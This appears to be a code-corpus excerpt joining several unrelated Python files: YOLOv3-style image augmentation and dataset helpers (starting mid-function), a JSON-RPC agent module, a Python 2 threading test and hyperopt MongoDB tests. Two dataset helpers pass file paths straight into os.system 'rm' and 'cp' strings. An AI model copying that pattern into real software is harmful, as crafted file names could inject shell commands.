x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, max(xc, w), min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Load labels
label_path = self.label_files[index]
if os.path.isfile(label_path):
x = self.labels[index]
if x is None: # labels not preloaded
with open(label_path, 'r') as f:
x = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32)
if x.size > 0:
# Normalized xywh to pixel xyxy format
labels = x.copy()
labels[:, 1] = w * (x[:, 1] - x[:, 3] / 2) + padw
labels[:, 2] = h * (x[:, 2] - x[:, 4] / 2) + padh
labels[:, 3] = w * (x[:, 1] + x[:, 3] / 2) + padw
labels[:, 4] = h * (x[:, 2] + x[:, 4] / 2) + padh
else:
labels = np.zeros((0, 5), dtype=np.float32)
labels4.append(labels)
# Concat/clip labels
if len(labels4):
labels4 = np.concatenate(labels4, 0)
# np.clip(labels4[:, 1:] - s / 2, 0, s, out=labels4[:, 1:]) # use with center crop
np.clip(labels4[:, 1:], 0, 2 * s, out=labels4[:, 1:]) # use with random_affine
# Augment
# img4 = img4[s // 2: int(s * 1.5), s // 2:int(s * 1.5)] # center crop (WARNING, requires box pruning)
img4, labels4 = random_affine(img4, labels4,
degrees=self.hyp['degrees'] * 1,
translate=self.hyp['translate'] * 1,
scale=self.hyp['scale'] * 1,
shear=self.hyp['shear'] * 1,
border=-s // 2) # border to remove
return img4, labels4
def letterbox(img, new_shape=(416, 416), color=(128, 128, 128),
auto=True, scaleFill=False, scaleup=True, interp=cv2.INTER_AREA):
# Resize image to a 32-pixel-multiple rectangle https://github.com/ultralytics/yolov3/issues/232
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = max(new_shape) / max(shape)
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, 32), np.mod(dh, 32) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = new_shape
ratio = new_shape[0] / shape[1], new_shape[1] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=interp) # INTER_AREA is better, INTER_LINEAR is faster
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratio, (dw, dh)
def random_affine(img, targets=(), degrees=10, translate=.1, scale=.1, shear=10, border=0):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# https://medium.com/uruvideo/dataset-augmentation-with-random-homographies-a8f4b44830d4
if targets is None: # targets = [cls, xyxy]
targets = []
height = img.shape[0] + border * 2
width = img.shape[1] + border * 2
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(img.shape[1] / 2, img.shape[0] / 2), scale=s)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(-translate, translate) * img.shape[0] + border # x translation (pixels)
T[1, 2] = random.uniform(-translate, translate) * img.shape[1] + border # y translation (pixels)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Combined rotation matrix
M = S @ T @ R # ORDER IS IMPORTANT HERE!!
changed = (border != 0) or (M != np.eye(3)).any()
if changed:
img = cv2.warpAffine(img, M[:2], dsize=(width, height), flags=cv2.INTER_AREA, borderValue=(128, 128, 128))
# Transform label coordinates
n = len(targets)
if n:
# warp points
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = (xy @ M.T)[:, :2].reshape(n, 8)
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
xy = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# # apply angle-based reduction of bounding boxes
# radians = a * math.pi / 180
# reduction = max(abs(math.sin(radians)), abs(math.cos(radians))) ** 0.5
# x = (xy[:, 2] + xy[:, 0]) / 2
# y = (xy[:, 3] + xy[:, 1]) / 2
# w = (xy[:, 2] - xy[:, 0]) * reduction
# h = (xy[:, 3] - xy[:, 1]) * reduction
# xy = np.concatenate((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).reshape(4, n).T
# reject warped points outside of image
xy[:, [0, 2]] = xy[:, [0, 2]].clip(0, width)
xy[:, [1, 3]] = xy[:, [1, 3]].clip(0, height)
w = xy[:, 2] - xy[:, 0]
h = xy[:, 3] - xy[:, 1]
area = w * h
area0 = (targets[:, 3] - targets[:, 1]) * (targets[:, 4] - targets[:, 2])
ar = np.maximum(w / (h + 1e-16), h / (w + 1e-16)) # aspect ratio
i = (w > 4) & (h > 4) & (area / (area0 + 1e-16) > 0.2) & (ar < 10)
targets = targets[i]
targets[:, 1:5] = xy[i]
return img, targets
def cutout(image, labels):
# https://arxiv.org/abs/1708.04552
# https://github.com/hysts/pytorch_cutout/blob/master/dataloader.py
# https://towardsdatascience.com/when-conventional-wisdom-fails-revisiting-data-augmentation-for-self-driving-cars-4831998c5509
h, w = image.shape[:2]
def bbox_ioa(box1, box2):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = [0.5] * 1 # + [0.25] * 4 + [0.125] * 16 + [0.0625] * 64 + [0.03125] * 256 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
mask_color = [random.randint(0, 255) for _ in range(3)]
image[ymin:ymax, xmin:xmax] = mask_color
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.90] # remove >90% obscured labels
return labels
def reduce_img_size(path='../data/sm4/images', img_size=1024): # from utils.datasets import *; reduce_img_size()
# creates a new ./images_reduced folder with reduced size images of maximum size img_size
path_new = path + '_reduced' # reduced images path
create_folder(path_new)
for f in tqdm(glob.glob('%s/*.*' % path)):
try:
img = cv2.imread(f)
h, w = img.shape[:2]
r = img_size / max(h, w) # size ratio
if r < 1.0:
img = cv2.resize(img, (int(w * r), int(h * r)), interpolation=cv2.INTER_AREA) # _LINEAR fastest
fnew = f.replace(path, path_new) # .replace(Path(f).suffix, '.jpg')
cv2.imwrite(fnew, img)
except:
print('WARNING: image failure %s' % f)
def convert_images2bmp(): # from utils.datasets import *; convert_images2bmp()
# Save images
formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]
# for path in ['../coco/images/val2014', '../coco/images/train2014']:
for path in ['../data/sm4/images', '../data/sm4/background']:
create_folder(path + 'bmp')
for ext in formats: # ['.bmp', '.jpg', '.jpeg', '.png', '.tif', '.dng']
for f in tqdm(glob.glob('%s/*%s' % (path, ext)), desc='Converting %s' % ext):
cv2.imwrite(f.replace(ext.lower(), '.bmp').replace(path, path + 'bmp'), cv2.imread(f))
# Save labels
# for path in ['../coco/trainvalno5k.txt', '../coco/5k.txt']:
for file in ['../data/sm4/out_train.txt', '../data/sm4/out_test.txt']:
with open(file, 'r') as f:
lines = f.read()
# lines = f.read().replace('2014/', '2014bmp/') # coco
lines = lines.replace('/images', '/imagesbmp')
lines = lines.replace('/background', '/backgroundbmp')
for ext in formats:
lines = lines.replace(ext, '.bmp')
with open(file.replace('.txt', 'bmp.txt'), 'w') as f:
f.write(lines)
def recursive_dataset2bmp(dataset='../data/sm4_bmp'): # from utils.datasets import *; recursive_dataset2bmp()
# Converts dataset to bmp (for faster training)
formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]
for a, b, files in os.walk(dataset):
for file in tqdm(files, desc=a):
p = a + '/' + file
s = Path(file).suffix
if s == '.txt': # replace text
with open(p, 'r') as f:
lines = f.read()
for f in formats:
lines = lines.replace(f, '.bmp')
with open(p, 'w') as f:
f.write(lines)
elif s in formats: # replace image
cv2.imwrite(p.replace(s, '.bmp'), cv2.imread(p))
if s != '.bmp':
os.system("rm '%s'" % p)
def imagelist2folder(path='data/coco_64img.txt'): # from utils.datasets import *; imagelist2folder()
# Copies all the images in a text file (list of images) into a folder
create_folder(path[:-4])
with open(path, 'r') as f:
for line in f.read().splitlines():
os.system('cp "%s" %s' % (line, path[:-4]))
print(line)
def create_folder(path='./new_folder'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
|
simplerpc.py
|
# -*- coding: utf-8 -*-
# @Author: gzliuxin
# @Email: gzliuxin@corp.netease.com
# @Date: 2017-07-12 16:56:14
import json
import time
import traceback
import uuid
from .jsonrpc import JSONRPCResponseManager, dispatcher
from .jsonrpc.jsonrpc2 import JSONRPC20Response
from .jsonrpc.exceptions import JSONRPCServerError
from .jsonrpc import six
DEBUG = False
BACKEND_UPDATE = False
class Callback(object):
"""Callback Proxy"""
WAITING, RESULT, ERROR, CANCELED = 0, 1, 2, 3
def __init__(self, rid, agent=None):
super(Callback, self).__init__()
self.rid = rid
self.agent = agent
self.result_callback = None
self.error_callback = None
self.status = self.WAITING
self.result = None
self.error = None
def on_result(self, func):
if not callable(func):
raise RuntimeError("%s should be callbale" % func)
self.result_callback = func
def on_error(self, func):
if not callable(func):
raise RuntimeError("%s should be callbale" % func)
self.error_callback = func
def rpc_result(self, data):
self.result = data
if callable(self.result_callback):
# callback function, set result as function return value
try:
self.result_callback(data)
except Exception:
traceback.print_exc()
self.status = self.RESULT
def rpc_error(self, data):
self.error = data
if callable(self.error_callback):
try:
self.error_callback(data)
except Exception:
traceback.print_exc()
self.status = self.ERROR
def cancel(self):
self.result_callback = None
self.error_callback = None
self.status = self.CANCELED
def wait(self, timeout=None):
start_time = time.time()
while True:
if not BACKEND_UPDATE:
self.agent.update()
if self.status == self.WAITING:
time.sleep(0.005)
if timeout and time.time() - start_time > timeout:
raise RpcTimeoutError(self)
else:
break
return self.result, self.error
def __str__(self):
conn = self.agent.get_connection()
return '{} (rid={}) (connection="{}")'.format(repr(self), self.rid, conn)
class AsyncResponse(object):
def __init__(self):
self.conn = None
self.rid = None
def setup(self, conn, rid):
self.conn = conn
self.rid = rid
def result(self, result):
ret = JSONRPC20Response(_id=self.rid, result=result)
if DEBUG:
print("-->", ret)
self.conn.send(ret.json)
def error(self, error):
assert isinstance(error, Exception), "%s must be Exception" % error
data = {
"type": error.__class__.__name__,
"args": error.args,
"message": str(error),
}
ret = JSONRPC20Response( _id=self.rid, error=JSONRPCServerError(data=data)._data)
if DEBUG:
print("-->", ret)
self.conn.send(ret.json)
class RpcAgent(object):
"""docstring for RpcAgent"""
REQUEST = 0
RESPONSE = 1
def __init__(self):
super(RpcAgent, self).__init__()
self._id = six.text_type(uuid.uuid4())
self._callbacks = {}
def call(self, *args, **kwargs):
raise NotImplementedError
def get_connection(self):
raise NotImplementedError
def format_request(self, func, *args, **kwargs):
rid = self._id
payload = {
"method": func,
"params": args or kwargs or [],
"jsonrpc": "2.0",
"id": rid,
}
self._id = six.text_type(uuid.uuid4()) # prepare next request id
# send rpc
req = json.dumps(payload)
if DEBUG:
print("-->", req)
# init cb
cb = Callback(rid, self)
self._callbacks[rid] = cb
return req, cb
def handle_request(self, req):
res = JSONRPCResponseManager.handle(req, dispatcher).data
return res
def handle_message(self, msg, conn):
if isinstance(msg, six.binary_type):
# py3里 json 只接受str类型,py2没有这个限制
msg = msg.decode('utf-8')
data = json.loads(msg)
if DEBUG:
print("<--", data)
if "method" in data:
# rpc request
message_type = self.REQUEST
result = self.handle_request(msg)
if isinstance(result.get("result"), AsyncResponse):
result["result"].setup(conn, result["id"])
else:
# if DEBUG:
# print("-->", result)
conn.send(json.dumps(result))
else:
# rpc response
message_type = self.RESPONSE
result = None
# handle callback
callback = self._callbacks.pop(data["id"])
if "result" in data:
callback.rpc_result(data["result"])
elif "error" in data:
callback.rpc_error(data["error"])
else:
pass
return message_type, result
def update(self):
raise NotImplementedError
def run(self):
def _run():
while True:
self.update()
time.sleep(0.002)
if BACKEND_UPDATE:
from threading import Thread
t = Thread(target=_run, name="update")
t.daemon = True
t.start()
else:
_run()
def console_run(self, local_dict=None):
global BACKEND_UPDATE
BACKEND_UPDATE = True
self.run()
from code import InteractiveInterpreter
i = InteractiveInterpreter(local_dict)
while True:
prompt = ">>>"
try:
line = input(prompt)
except EOFError:
print("closing..")
return
i.runcode(line)
class RpcTimeoutError(Exception):
pass
class RpcConnectionError(Exception):
pass
|
test_threading.py
|
# Very rudimentary test of threading module
import test.test_support
from test.test_support import verbose, is_jython
import random
import sys
import threading
import thread
import time
import unittest
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() * 2
if verbose:
print 'task', self.getName(), 'will run for', delay, 'sec'
self.sema.acquire()
self.mutex.acquire()
self.nrunning.inc()
if verbose:
print self.nrunning.get(), 'tasks are running'
self.testcase.assert_(self.nrunning.get() <= 3)
self.mutex.release()
time.sleep(delay)
if verbose:
print 'task', self.getName(), 'done'
self.mutex.acquire()
self.nrunning.dec()
self.testcase.assert_(self.nrunning.get() >= 0)
if verbose:
print self.getName(), 'is finished.', self.nrunning.get(), \
'tasks are running'
self.mutex.release()
self.sema.release()
class ThreadTests(unittest.TestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
t.start()
if verbose:
print 'waiting for all tasks to complete'
for t in threads:
t.join(NUMTASKS)
self.assert_(not t.isAlive())
if verbose:
print 'all tasks done'
self.assertEqual(numrunning.get(), 0)
# run with a small(ish) thread stack size (256kB)
def test_various_ops_small_stack(self):
if verbose:
print 'with 256kB thread stack size...'
try:
threading.stack_size(262144)
except thread.error:
if verbose:
print 'platform does not support changing thread stack size'
return
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1MB)
def test_various_ops_large_stack(self):
if verbose:
print 'with 1MB thread stack size...'
try:
threading.stack_size(0x100000)
except thread.error:
if verbose:
print 'platform does not support changing thread stack size'
return
self.test_various_ops()
threading.stack_size(0)
# this test is not applicable to jython since
# 1. Lock is equiv to RLock, so this weird sync behavior won't be seen
# 2. We use a weak hash map to map these threads
# 3. This behavior doesn't make sense for Jython since any foreign
# Java threads can use the same underlying locks, etc
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Acquiring an RLock forces an entry for the foreign
# thread to get made in the threading._active map.
r = threading.RLock()
r.acquire()
r.release()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
tid = thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assert_(tid in threading._active)
self.assert_(isinstance(threading._active[tid],
threading._DummyThread))
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def test_PyThreadState_SetAsyncExc(self):
try:
import ctypes
except ImportError:
if verbose:
print "test_PyThreadState_SetAsyncExc can't import ctypes"
return # can't do anything
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = thread.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.setDaemon(True) # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print " started worker thread"
# Try a thread id that doesn't make sense.
if verbose:
print " trying nonsensical thread id"
result = set_async_exc(ctypes.c_long(-1), exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print " waiting for worker thread to get started"
worker_started.wait()
if verbose:
print " verifying worker hasn't exited"
self.assert_(not t.finished)
if verbose:
print " attempting to raise asynch exception in worker"
result = set_async_exc(ctypes.c_long(t.id), exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print " waiting for worker to say it caught the exception"
worker_saw_exception.wait(timeout=10)
self.assert_(t.finished)
if verbose:
print " all OK -- joining worker"
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getcheckinterval()
sys.setcheckinterval(1)
try:
for i in xrange(1, 1000):
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertFalse(t in l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setcheckinterval(old_interval)
if is_jython:
del ThreadTests.test_enumerate_after_join
del ThreadTests.test_foreign_thread
del ThreadTests.test_PyThreadState_SetAsyncExc
def test_main():
test.test_support.run_unittest(ThreadTests)
if __name__ == "__main__":
test_main()
|
test_mongoexp.py
|
import six.moves.cPickle as pickle
import os
import signal
import subprocess
import sys
import traceback
import threading
import time
import unittest
import numpy as np
import nose
import nose.plugins.skip
from hyperopt.base import JOB_STATE_DONE, STATUS_OK
from hyperopt.mongoexp import parse_url
from hyperopt.mongoexp import MongoTrials
from hyperopt.mongoexp import MongoWorker
from hyperopt.mongoexp import ReserveTimeout
from hyperopt.mongoexp import as_mongo_str
from hyperopt.mongoexp import main_worker_helper
from hyperopt.mongoexp import MongoJobs
from hyperopt.fmin import fmin
from hyperopt import hp, rand
import hyperopt.tests.test_base
from hyperopt.tests.unit.test_domains import gauss_wave2
def skiptest(f):
def wrapper(*args, **kwargs):
raise nose.plugins.skip.SkipTest()
wrapper.__name__ = f.__name__
return wrapper
class TempMongo:
"""
Context manager for tests requiring a live database.
with TempMongo() as foo:
mj = foo.mongo_jobs('test1')
"""
def __init__(self, workdir="/tmp/hyperopt_test"):
self.workdir = workdir
def __enter__(self):
try:
open(self.workdir)
assert 0
except OSError:
subprocess.call(["mkdir", "-p", "%s/db" % self.workdir])
proc_args = [
"mongod",
"--dbpath=%s/db" % self.workdir,
"--noprealloc",
"--port=22334",
]
print("starting mongod", proc_args)
self.mongo_proc = subprocess.Popen(
proc_args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd=self.workdir, # this prevented mongod assertion fail
)
try:
interval = 0.125
while interval <= 2:
if interval > 0.125:
print("Waiting for mongo to come up")
time.sleep(interval)
interval *= 2
if self.db_up():
break
if self.db_up():
return self
else:
try:
os.kill(self.mongo_proc.pid, signal.SIGTERM)
except OSError:
pass # if it crashed there is no such process
out, err = self.mongo_proc.communicate()
print(out, file=sys.stderr)
print(err, file=sys.stderr)
raise RuntimeError("No database connection", proc_args)
except Exception as e:
try:
os.kill(self.mongo_proc.pid, signal.SIGTERM)
except OSError:
pass # if it crashed there is no such process
raise e
def __exit__(self, *args):
os.kill(self.mongo_proc.pid, signal.SIGTERM)
self.mongo_proc.wait()
subprocess.call(["rm", "-Rf", self.workdir])
@staticmethod
def connection_string(dbname):
return as_mongo_str(f"localhost:22334/{dbname}/jobs")
@staticmethod
def mongo_jobs(dbname):
return MongoJobs.new_from_connection_str(TempMongo.connection_string(dbname))
def db_up(self):
try:
self.mongo_jobs("__test_db")
return True
except: # XXX: don't know what exceptions to put here
return False
def test_parse_url():
uris = [
"mongo://hyperopt:foobar@127.0.0.1:27017/hyperoptdb/jobs",
"mongo://hyperopt:foobar@127.0.0.1:27017/hyperoptdb/jobs?authSource=db1",
]
expected = [
("mongo", "hyperopt", "foobar", "127.0.0.1", 27017, "hyperoptdb", "jobs", None),
(
"mongo",
"hyperopt",
"foobar",
"127.0.0.1",
27017,
"hyperoptdb",
"jobs",
"db1",
),
]
for i, uri in enumerate(uris):
assert parse_url(uri) == expected[i]
# -- If we can't create a TempMongo instance, then
# simply print what happened,
try:
with TempMongo() as temp_mongo:
pass
except OSError as e:
print(e, file=sys.stderr)
print(
("Failed to create a TempMongo context," " skipping all mongo tests."),
file=sys.stderr,
)
if "such file" in str(e):
print("Hint: is mongod executable on path?", file=sys.stderr)
raise nose.SkipTest()
class TestMongoTrials(hyperopt.tests.test_base.TestTrials):
def setUp(self):
self.temp_mongo = TempMongo()
self.temp_mongo.__enter__()
self.trials = MongoTrials(
self.temp_mongo.connection_string("foo"), exp_key=None
)
def tearDown(self, *args):
self.temp_mongo.__exit__(*args)
def with_mongo_trials(f, exp_key=None):
def wrapper():
with TempMongo() as temp_mongo:
trials = MongoTrials(temp_mongo.connection_string("foo"), exp_key=exp_key)
print("Length of trials: ", len(trials.results))
f(trials)
wrapper.__name__ = f.__name__
return wrapper
def _worker_thread_fn(host_id, n_jobs, timeout, dbname="foo", logfilename=None):
mw = MongoWorker(
mj=TempMongo.mongo_jobs(dbname),
logfilename=logfilename,
workdir="mongoexp_test_dir",
)
try:
while n_jobs:
mw.run_one(host_id, timeout, erase_created_workdir=True)
print("worker: %s ran job" % str(host_id))
n_jobs -= 1
except ReserveTimeout:
print("worker timed out:", host_id)
pass
def with_worker_threads(n_threads, dbname="foo", n_jobs=sys.maxsize, timeout=10.0):
"""
Decorator that will run a test with some MongoWorker threads in flight
"""
def newth(ii):
return threading.Thread(
target=_worker_thread_fn, args=(("hostname", ii), n_jobs, timeout, dbname)
)
def deco(f):
def wrapper(*args, **kwargs):
# --start some threads
threads = list(map(newth, list(range(n_threads))))
[th.start() for th in threads]
try:
return f(*args, **kwargs)
finally:
[th.join() for th in threads]
wrapper.__name__ = f.__name__ # -- nose requires test in name
return wrapper
return deco
@with_mongo_trials
def test_with_temp_mongo(trials):
pass # -- just verify that the decorator can run
@with_mongo_trials
def test_new_trial_ids(trials):
a = trials.new_trial_ids(1)
b = trials.new_trial_ids(2)
c = trials.new_trial_ids(3)
assert len(a) == 1
assert len(b) == 2
assert len(c) == 3
s = set()
s.update(a)
s.update(b)
s.update(c)
assert len(s) == 6
@with_mongo_trials
def test_attachments(trials):
blob = b"abcde"
assert "aname" not in trials.attachments
trials.attachments["aname"] = blob
assert "aname" in trials.attachments
assert trials.attachments["aname"] == blob
assert trials.attachments["aname"] == blob
blob2 = b"zzz"
trials.attachments["aname"] = blob2
assert "aname" in trials.attachments
assert trials.attachments["aname"] == blob2
assert trials.attachments["aname"] == blob2
del trials.attachments["aname"]
assert "aname" not in trials.attachments
@with_mongo_trials
def test_delete_all_on_attachments(trials):
trials.attachments["aname"] = "a"
trials.attachments["aname2"] = "b"
assert "aname2" in trials.attachments
trials.delete_all()
assert "aname" not in trials.attachments
assert "aname2" not in trials.attachments
def test_handles_are_independent():
with TempMongo() as tm:
t1 = tm.mongo_jobs("t1")
t2 = tm.mongo_jobs("t2")
assert len(t1) == 0
assert len(t2) == 0
# test that inserting into t1 doesn't affect t2
t1.insert({"a": 7})
assert len(t1) == 1
assert len(t2) == 0
def passthrough(x):
assert os.path.split(os.getcwd()).count("mongoexp_test_dir") == 1, (
"cwd is %s" % os.getcwd()
)
return x
class TestExperimentWithThreads(unittest.TestCase):
@staticmethod
def worker_thread_fn(host_id, n_jobs, timeout):
mw = MongoWorker(
mj=TempMongo.mongo_jobs("foodb"),
logfilename=None,
workdir="mongoexp_test_dir",
)
while n_jobs:
mw.run_one(host_id, timeout, erase_created_workdir=True)
print("worker: %s ran job" % str(host_id))
n_jobs -= 1
@staticmethod
def fmin_thread_fn(space, trials, max_evals, seed):
fmin(
fn=passthrough,
space=space,
algo=rand.suggest,
trials=trials,
rstate=np.random.default_rng(seed),
max_evals=max_evals,
return_argmin=False,
)
def test_seeds_AAB(self):
# launch 3 simultaneous experiments with seeds A, A, B.
# Verify all experiments run to completion.
# Verify first two experiments run identically.
# Verify third experiment runs differently.
exp_keys = ["A0", "A1", "B"]
seeds = [1, 1, 2]
n_workers = 2
jobs_per_thread = 6
# -- total jobs = 2 * 6 = 12
# -- divided by 3 experiments: 4 jobs per fmin
max_evals = (n_workers * jobs_per_thread) // len(exp_keys)
# -- should not matter which domain is used here
domain = gauss_wave2()
pickle.dumps(domain.expr)
pickle.dumps(passthrough)
worker_threads = [
threading.Thread(
target=TestExperimentWithThreads.worker_thread_fn,
args=(("hostname", ii), jobs_per_thread, 30.0),
)
for ii in range(n_workers)
]
with TempMongo() as tm:
mj = tm.mongo_jobs("foodb")
print(mj)
trials_list = [
MongoTrials(tm.connection_string("foodb"), key) for key in exp_keys
]
fmin_threads = [
threading.Thread(
target=TestExperimentWithThreads.fmin_thread_fn,
args=(domain.expr, trials, max_evals, seed),
)
for seed, trials in zip(seeds, trials_list)
]
try:
[th.start() for th in worker_threads + fmin_threads]
finally:
print("joining worker threads...")
[th.join() for th in worker_threads + fmin_threads]
# -- not using an exp_key gives a handle to all the trials
# in foodb
all_trials = MongoTrials(tm.connection_string("foodb"))
self.assertEqual(len(all_trials), n_workers * jobs_per_thread)
# Verify that the fmin calls terminated correctly:
for trials in trials_list:
self.assertEqual(
trials.count_by_state_synced(JOB_STATE_DONE), max_evals
)
self.assertEqual(
trials.count_by_state_unsynced(JOB_STATE_DONE), max_evals
)
self.assertEqual(len(trials), max_evals)
# Verify that the first two experiments match.
# (Do these need sorting by trial id?)
trials_A0, trials_A1, trials_B0 = trials_list
self.assertEqual(
[t["misc"]["vals"] for t in trials_A0.trials],
[t["misc"]["vals"] for t in trials_A1.trials],
)
# Verify that the last experiment does not match.
# (Do these need sorting by trial id?)
self.assertNotEqual(
[t["misc"]["vals"] for t in trials_A0.trials],
[t["misc"]["vals"] for t in trials_B0.trials],
)
def objective_with_attachments(x: float):
"""Objective function that includes extra information as attachments and
dictionary attributes."""
return {
"loss": x ** 2,
"status": STATUS_OK,
"extra_stuff": {"type": None, "value": [0, 1, 2]},
"attachments": {"time": pickle.dumps(time.time)},
}
def fmin_thread_fn(space, mongo_trials: MongoTrials, max_evals: int):
fmin(
fn=objective_with_attachments,
space=space,
algo=rand.suggest,
trials=mongo_trials,
rstate=np.random.default_rng(),
max_evals=max_evals,
return_argmin=False,
)
def test_trial_attachments():
exp_key = "A"
with TempMongo() as tm:
mj = tm.mongo_jobs("foo")
trials = MongoTrials(tm.connection_string("foo"), exp_key=exp_key)
space = hp.uniform("x", -10, 10)
max_evals = 3
fmin_thread = threading.Thread(
target=fmin_thread_fn, args=(space, trials, max_evals)
)
fmin_thread.start()
mw = MongoWorker(mj=mj, logfilename=None, workdir="mongoexp_test_dir")
n_jobs = max_evals
while n_jobs:
try:
mw.run_one("hostname", 10.0, erase_created_workdir=True)
print("worker: ran job")
except Exception as exc:
print(f"worker: encountered error : {str(exc)}")
traceback.print_exc()
n_jobs -= 1
fmin_thread.join()
all_trials = MongoTrials(tm.connection_string("foo"))
assert len(all_trials) == max_evals
assert trials.count_by_state_synced(JOB_STATE_DONE) == max_evals
